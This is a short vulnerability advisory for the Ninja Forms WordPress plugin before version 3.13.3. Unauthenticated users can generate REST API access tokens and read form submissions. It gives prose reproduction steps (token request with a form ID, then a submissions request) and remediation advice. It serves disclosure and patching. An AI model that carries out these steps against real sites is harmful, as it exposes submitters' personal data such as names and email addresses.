Ninja Forms WordPress Plugin Unauthenticated Access Token Generation Vulnerability

A vulnerability in the Ninja Forms WordPress plugin, affecting versions prior to 3.13.3, allows unauthenticated attackers to generate valid access tokens through the REST API. These tokens can then be used to access and read form submissions.

Impact

Exploitation of this vulnerability leads to unauthorized access to form submissions, allowing attackers to read all submitted data.

Reproduction

To reproduce this vulnerability, first create a form using the Ninja Forms plugin and note the Form ID. After submitting an entry, generate a valid access token without authentication by sending a POST request to the REST API endpoint for token generation, including the Form ID in the request. The response will contain the generated token. This token can then be used to access the submissions for the corresponding form by sending a GET request to the submissions endpoint, including the token in the authorization header. The response will disclose all form data, including names and email addresses.

Remediation

Users are advised to update the Ninja Forms WordPress plugin to version 3.13.3 or later.